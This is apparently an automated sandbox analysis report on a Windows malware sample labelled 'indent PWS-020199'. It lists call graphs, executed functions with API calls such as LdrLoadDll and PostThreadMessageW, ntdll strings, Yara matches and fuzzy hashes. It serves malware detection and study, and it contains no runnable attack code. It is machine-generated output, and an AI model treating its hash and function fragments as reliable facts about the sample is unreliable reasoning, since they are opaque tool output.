93215->93216 93216->93183 93218 413f12 93217->93218 93219 414067 93218->93219 93222 414030 93218->93222 93226 414026 93218->93226 93228 427623 93218->93228 93219->93212 93221 414044 93221->93219 93237 41af43 RtlFreeHeap LdrInitializeThunk 93221->93237 93222->93219 93236 41af43 RtlFreeHeap LdrInitializeThunk 93222->93236 93224 41405d 93224->93212 93233 413943 93226->93233 93229 427680 93228->93229 93230 4276bb 93229->93230 93238 414073 93229->93238 93230->93218 93232 42769d 93232->93218 93243 42b623 93233->93243 93236->93221 93237->93224 93239 41404a 93238->93239 93241 41405d 93239->93241 93242 41af43 RtlFreeHeap LdrInitializeThunk 93239->93242 93241->93232 93242->93241 93244 42b640 93243->93244 93247 14f2c70 LdrInitializeThunk 93244->93247 93245 413965 93245->93222 93247->93245 93248 41ae23 93249 41ae67 93248->93249 93250 41ae88 93249->93250 93251 42b3b3 NtClose 93249->93251 93251->93250 93252 413dc3 93253 413ddd 93252->93253 93258 4177a3 93253->93258 93255 413dfb 93256 413e2f PostThreadMessageW 93255->93256 93257 413e40 93255->93257 93256->93257 93260 4177c7 93258->93260 93259 4177ce 93259->93255 93260->93259 93262 4177ed 93260->93262 93265 42e753 LdrLoadDll 93260->93265 93263 41781a 93262->93263 93264 417809 LdrLoadDll 93262->93264 93263->93255 93264->93263 93265->93262 93266 4189a8 93267 4189b2 93266->93267 93268 42b3b3 NtClose 93266->93268 93268->93267 93269 14f2b60 LdrInitializeThunk

                            Executed Functions

                            Function 004177A3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 70 4177a3-4177bf 71 4177c7-4177cc 70->71 72 4177c2 call 42df93 70->72 73 4177d2-4177e0 call 42e4b3 71->73 74 4177ce-4177d1 71->74 72->71 77 4177f0-417801 call 42c963 73->77 78 4177e2-4177ed call 42e753 73->78 83 417803-417817 LdrLoadDll 77->83 84 41781a-41781d 77->84 78->77 83->84
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417815
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: ad6e33b8d4698c7c43c606e25c9bf4f40c21fa71ffe3f46a1f23721449fc8031
                            • Instruction ID: 294aed6e08e9ddd7390ea3223caf849b1311428ad197b17d367300f23ad4eef7
                            • Opcode Fuzzy Hash: ad6e33b8d4698c7c43c606e25c9bf4f40c21fa71ffe3f46a1f23721449fc8031
                            • Instruction Fuzzy Hash: FC0152B5E0010DABDB10DAA1DD42FDEB3B89B54308F00819AE91897280F634EB548755
                            Function 0042B3B3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 91 42b3b3-42b3ef call 404763 call 42c463 NtClose
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 9fde11d416b0d293b7434aa2a4f363c7c1aa4e8899d97a94e070bdcfd642db47
                            • Instruction ID: 3bbc09addf8e7b80407b9746e42dd2db9163c20fc8507471cf867cd052bb6c5e
                            • Opcode Fuzzy Hash: 9fde11d416b0d293b7434aa2a4f363c7c1aa4e8899d97a94e070bdcfd642db47
                            • Instruction Fuzzy Hash: 70E04F752012147BD550BB5ADC81F9B776CDBC5B14F10405AFA1867285C670B91587B4
                            Function 014F2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 105 14f2b60-14f2b6c LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 9fd5eff8da39edb7cdc570f119ed70dd174739ff46e7915c2a42122f1513b7e6
                            • Instruction ID: 3d977b02c033fdd496f536e88c9592bc7cdb4f40cbb32fbd8bec6f5d353f3015
                            • Opcode Fuzzy Hash: 9fd5eff8da39edb7cdc570f119ed70dd174739ff46e7915c2a42122f1513b7e6
                            • Instruction Fuzzy Hash: 6990026160280043410671984414A16404AA7E0211B59C421E10149D4DC56589D16225
                            Function 014F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 107 14f2df0-14f2dfc LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ebd96cad7d876e827cf3d3156201ef1801eccc9179fcc119b58e8a3ed0db193d
                            • Instruction ID: 29a533a705252cf03705c4bfd28e396fc283f9f2868ec48b525b71b6c979d548
                            • Opcode Fuzzy Hash: ebd96cad7d876e827cf3d3156201ef1801eccc9179fcc119b58e8a3ed0db193d
                            • Instruction Fuzzy Hash: 0190023160180453D11271984504B070049A7D0251F99C812A042499CDD6968A92A221
                            Function 014F2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 106 14f2c70-14f2c7c LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 5d069a01ebca24cb429f049d7905b71d22b5357332cbe8a1d5c3d157d724cc0d
                            • Instruction ID: 2f0bf10be758f64fdd76abde4a235edf02022ae2cc8f679ef5eb13e78d76443b
                            • Opcode Fuzzy Hash: 5d069a01ebca24cb429f049d7905b71d22b5357332cbe8a1d5c3d157d724cc0d
                            • Instruction Fuzzy Hash: E890023160188842D11171988404B4A0045A7D0311F5DC811A4424A9CDC6D589D17221
                            Function 014F35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 108 14f35c0-14f35cc LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b83c988a2980b3ed637095052300fb9f8057a7bf092e520abc52ddd553c41f20
                            • Instruction ID: 1faeec559c12745f30956bb5caf7ea1cb7e69fe82825fa3670acc4ce0d3a3985
                            • Opcode Fuzzy Hash: b83c988a2980b3ed637095052300fb9f8057a7bf092e520abc52ddd553c41f20
                            • Instruction Fuzzy Hash: 09900231A0590442D10171984514B061045A7D0211F69C811A04249ACDC7D58A9166A2
                            Function 00413DC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(3e3-f82u,00000111,00000000,00000000), ref: 00413E3A
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: 3e3-f82u$3e3-f82u
                            • API String ID: 1836367815-3570064524
                            • Opcode ID: 964b1a518f179304d15258d92e56af9165c4296da7e25323e46f0ecb45248fe0
                            • Instruction ID: d361b23971787dacf71cfae603cf0aa6b00f04970a787b420ae699f92cef73d6
                            • Opcode Fuzzy Hash: 964b1a518f179304d15258d92e56af9165c4296da7e25323e46f0ecb45248fe0
                            • Instruction Fuzzy Hash: 99010472D0025C7AEB00AAA1DC81DEF7B7CDF81698F048029FA04B7241E26C4F064BA5
                            Function 00413DBC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(3e3-f82u,00000111,00000000,00000000), ref: 00413E3A
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: 3e3-f82u$3e3-f82u
                            • API String ID: 1836367815-3570064524
                            • Opcode ID: 56091d63647a73e78b59afa9c0379d0a8fd660b90821133ca5b8bb48554b8192
                            • Instruction ID: 1ee11678f6b95ad5cbeb96aa9bd9200331453552f3793e10e8ce694d2c8317cb
                            • Opcode Fuzzy Hash: 56091d63647a73e78b59afa9c0379d0a8fd660b90821133ca5b8bb48554b8192
                            • Instruction Fuzzy Hash: 7B01E572D0025C7AEB119EA5DC81DEF7B3CDF81698F04806AFA04B7101D17C4F054BA5
                            Function 00417823 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 37 417823-41782d 38 417879-41787e 37->38 39 41782f-417832 37->39 42 417809-417817 LdrLoadDll 38->42 43 41787f-417880 38->43 40 417834-41784b 39->40 41 417859-417868 39->41 44 41784d-417856 40->44 49 41786a-417875 41->49 50 4178dd-4178e2 41->50 45 41781a-41781d 42->45 47 417881-4178a4 43->47 44->44 48 417858 44->48 51 4178d6-4178dc 47->51 48->41 49->47 52 417877-417878 49->52 53 417913 50->53 54 4178e4-4178e9 50->54 51->50 52->38 54->51 55 4178eb-417901 54->55
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %
                            • API String ID: 0-2567322570
                            • Opcode ID: 31435a2de6e9dcd5047e3490d85f2cb0b886ad7c4131b10d5f15071b1693a14e
                            • Instruction ID: d24db651db936282d9dbbd60b2dea7dff43481d8c0edebd8f7235c9c73e6a5af
                            • Opcode Fuzzy Hash: 31435a2de6e9dcd5047e3490d85f2cb0b886ad7c4131b10d5f15071b1693a14e
                            • Instruction Fuzzy Hash: 1A219C71A48346EFC711DF68D88AAE6FFB8FB06321B5005AFE4408B501E3355592CBA9
                            Function 0042B713 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 56 42b713-42b754 call 404763 call 42c463 RtlFreeHeap
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B74F
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID: TeA
                            • API String ID: 3298025750-2376446362
                            • Opcode ID: 45c5b3800b981f43542a4392730af974c9a10f132f0c51a56b02927ff5448233
                            • Instruction ID: 4c13e59a443a0f628453689530e0f5e7070eda3d8d98b1e8b69c11cd1c5738d6
                            • Opcode Fuzzy Hash: 45c5b3800b981f43542a4392730af974c9a10f132f0c51a56b02927ff5448233
                            • Instruction Fuzzy Hash: B7E06DB12002047BD610EE59ED81E9B33ACEFCA714F004019FA19A7282C670B9108BB9
                            Function 0042B6C3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 86 42b6c3-42b707 call 404763 call 42c463 RtlAllocateHeap
                            APIs
                            • RtlAllocateHeap.NTDLL(?,0041DFFB,?,?,00000000,?,0041DFFB,?,?,?), ref: 0042B702
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 8e739d84df725d30fdb527b24dd1d2b1529f58f19dbd7a5eecf565546dbdda6e
                            • Instruction ID: 241b6091c27ceea5cc9c8f587e217b89b7d66a2a3dccfab7ee1f8c84fe53370e
                            • Opcode Fuzzy Hash: 8e739d84df725d30fdb527b24dd1d2b1529f58f19dbd7a5eecf565546dbdda6e
                            • Instruction Fuzzy Hash: FDE06DB12042047BD610EE59ED91EAB37ADDFC9714F000419FA18A7242C770B9108BB8
                            Function 0042B763 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 96 42b763-42b79c call 404763 call 42c463 ExitProcess
                            APIs
                            • ExitProcess.KERNEL32(?,00000000,?,?,1F5ADF2D,?,?,1F5ADF2D), ref: 0042B797
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 45670515aa6731c333c331b8d19f7660354fd550c8e377c5be3dfaa8c99f04df
                            • Instruction ID: f57e7f860c7e2a7a1a8538e7253132146e27b51913fc16334dbca63edcb15685
                            • Opcode Fuzzy Hash: 45670515aa6731c333c331b8d19f7660354fd550c8e377c5be3dfaa8c99f04df
                            • Instruction Fuzzy Hash: 1BE086322002147BC110FA6ADC81F9B775DDFC5714F40401AFA0CAB145C775791487F4
                            Function 014F2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 101 14f2c0a-14f2c0f 102 14f2c1f-14f2c26 LdrInitializeThunk 101->102 103 14f2c11-14f2c18 101->103
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 809a5c5f1316f5ca696e6c958fa47e76aa92c1c26595163ab673ae119676917c
                            • Instruction ID: 4540d13d4d0c05d6f88e8037061970199dd5d3f0be26752b31dfaf05d4b2c75a
                            • Opcode Fuzzy Hash: 809a5c5f1316f5ca696e6c958fa47e76aa92c1c26595163ab673ae119676917c
                            • Instruction Fuzzy Hash: E7B09B71D019C5C5DA12E7A44608F177940B7D0711F19C466D3030696F8778C1D1E275

                            Non-executed Functions

                            Function 01532349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-2160512332
                            • Opcode ID: 1f405af8056d99000b04a42a8de3da7cd01f0a1995dbed0f7fb8fa5e37a12632
                            • Instruction ID: 4c406c08f923a0f85723ac66ccfadb8ca031e77243f1cbced077ec4714eee2ed
                            • Opcode Fuzzy Hash: 1f405af8056d99000b04a42a8de3da7cd01f0a1995dbed0f7fb8fa5e37a12632
                            • Instruction Fuzzy Hash: E0927E71608742AFE721CF29C840B6BBBE8BBD4754F04491EFA94DB261D770E845CB92
                            Function 014E8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                            Download Yara Rule
                            Strings
                            • Critical section debug info address, xrefs: 0152541F, 0152552E
                            • Critical section address., xrefs: 01525502
                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015254CE
                            • Address of the debug info found in the active list., xrefs: 015254AE, 015254FA
                            • double initialized or corrupted critical section, xrefs: 01525508
                            • Thread is in a state in which it cannot own a critical section, xrefs: 01525543
                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015254E2
                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0152540A, 01525496, 01525519
                            • 8, xrefs: 015252E3
                            • Critical section address, xrefs: 01525425, 015254BC, 01525534
                            • undeleted critical section in freed memory, xrefs: 0152542B
                            • Invalid debug info address of this critical section, xrefs: 015254B6
                            • corrupted critical section, xrefs: 015254C2
                            • Thread identifier, xrefs: 0152553A
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                            • API String ID: 0-2368682639
                            • Opcode ID: 1f1ebe1681397304dd7f453e470f49ed0a0c762622ce99515ef611eba2d05e8e
                            • Instruction ID: 4757d3110abf6e3d2ec780d20ef9b62ac82a079c31db9d7d060cecfb925c442e
                            • Opcode Fuzzy Hash: 1f1ebe1681397304dd7f453e470f49ed0a0c762622ce99515ef611eba2d05e8e
                            • Instruction Fuzzy Hash: 68819F71A40359AFDF20CF99C845BEEBBF5BB19714F20411AF504BB2A0E371A945CB90
                            Function 014E29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                            Download Yara Rule
                            Strings
                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015225EB
                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01522602
                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015222E4
                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0152261F
                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01522409
                            • @, xrefs: 0152259B
                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01522412
                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01522624
                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015224C0
                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01522506
                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01522498
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                            • API String ID: 0-4009184096
                            • Opcode ID: 24aa5128e70df68a80a20d9ffa921cec6db0b7f9e1ff4c34d89b15794be447a5
                            • Instruction ID: 316fabe0d7de17b0275001e85ffe3bc403bff7e9a721470cafd7c08422de086f
                            • Opcode Fuzzy Hash: 24aa5128e70df68a80a20d9ffa921cec6db0b7f9e1ff4c34d89b15794be447a5
                            • Instruction Fuzzy Hash: 720290B6D002299BDB31CB54CC84B9EB7B8BF55304F4041DAE609AB291DB70AF84CF59
                            Function 01558B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                            • API String ID: 0-2515994595
                            • Opcode ID: 7ba339c19f46c7869bb3ecefa003b5b17043a633c3100be05a885c37dd1fd5ea
                            • Instruction ID: a191b3d05d0f13111d60347dd341646510478199e4ea108f959d40c631cb1998
                            • Opcode Fuzzy Hash: 7ba339c19f46c7869bb3ecefa003b5b17043a633c3100be05a885c37dd1fd5ea
                            • Instruction Fuzzy Hash: BE51C0711143059BD365DF1AC864BAFBBE8FF94240F24491FAE55CB250E770D604C792
                            Function 01560274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                            • API String ID: 0-1700792311
                            • Opcode ID: 125261fccfd74e807be6003550a9ef5d9777052ce3454cc110f7e143f5acbf7d
                            • Instruction ID: 46c0b1e2e57a122638e53954e0617058453d1fb39b7e02f113b42b591dcdea47
                            • Opcode Fuzzy Hash: 125261fccfd74e807be6003550a9ef5d9777052ce3454cc110f7e143f5acbf7d
                            • Instruction Fuzzy Hash: 54D1FF31600286DFDB22DFA9C440AADBBF9FF69700F59805AF4459F2A2C774D981CB90
                            Function 015389B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                            Download Yara Rule
                            Strings
                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01538A3D
                            • AVRF: -*- final list of providers -*- , xrefs: 01538B8F
                            • VerifierDebug, xrefs: 01538CA5
                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01538A67
                            • VerifierDlls, xrefs: 01538CBD
                            • VerifierFlags, xrefs: 01538C50
                            • HandleTraces, xrefs: 01538C8F
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                            • API String ID: 0-3223716464
                            • Opcode ID: 4747776bc3f12734aa9c19d44aff0d59f2acc3e846b76b47a0dc949e6cc6f7bd
                            • Instruction ID: 35535e58dc6de5e31ae04d52a4e74a1a1348ef1fc4db4dd3b6691514be4ec978
                            • Opcode Fuzzy Hash: 4747776bc3f12734aa9c19d44aff0d59f2acc3e846b76b47a0dc949e6cc6f7bd
                            • Instruction Fuzzy Hash: 589134B1681306AFD726DF69C890F5A7BE4BFE0B14F860A1DFA506F250D7709C058791
                            Function 014BEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                            • API String ID: 0-1109411897
                            • Opcode ID: e5deb6f294a3aa03826dadb64b7a0d540d03e86df8e72abf9042c6c2e81ad2cc
                            • Instruction ID: eb5fde9b9f1b055082a865fdd1d233b5e4ee776d76c813ce22401d90c1aaf994
                            • Opcode Fuzzy Hash: e5deb6f294a3aa03826dadb64b7a0d540d03e86df8e72abf9042c6c2e81ad2cc
                            • Instruction Fuzzy Hash: C1A23B74A0562A8BEB65CF19CC887EDBBB5BB45304F1442EAD50DAB364DB309E85CF10
                            Function 014E63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-792281065
                            • Opcode ID: 06e45c985ab9d1ad1506924c965b5d2599983c0b2a174b432f68ec567451384c
                            • Instruction ID: af3658c560d412eaaf17bc8cba4bf8a082f15f9a5484a6b4ec4a389a92ed30fe
                            • Opcode Fuzzy Hash: 06e45c985ab9d1ad1506924c965b5d2599983c0b2a174b432f68ec567451384c
                            • Instruction Fuzzy Hash: 0D912731B403269BEB25DF59D848BAE7BE1BF62B14F56012ED5106F2E1D7B09801C794
                            Function 014A645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                            Download Yara Rule
                            Strings
                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01509A2A
                            • apphelp.dll, xrefs: 014A6496
                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01509A01
                            • minkernel\ntdll\ldrinit.c, xrefs: 01509A11, 01509A3A
                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015099ED
                            • LdrpInitShimEngine, xrefs: 015099F4, 01509A07, 01509A30
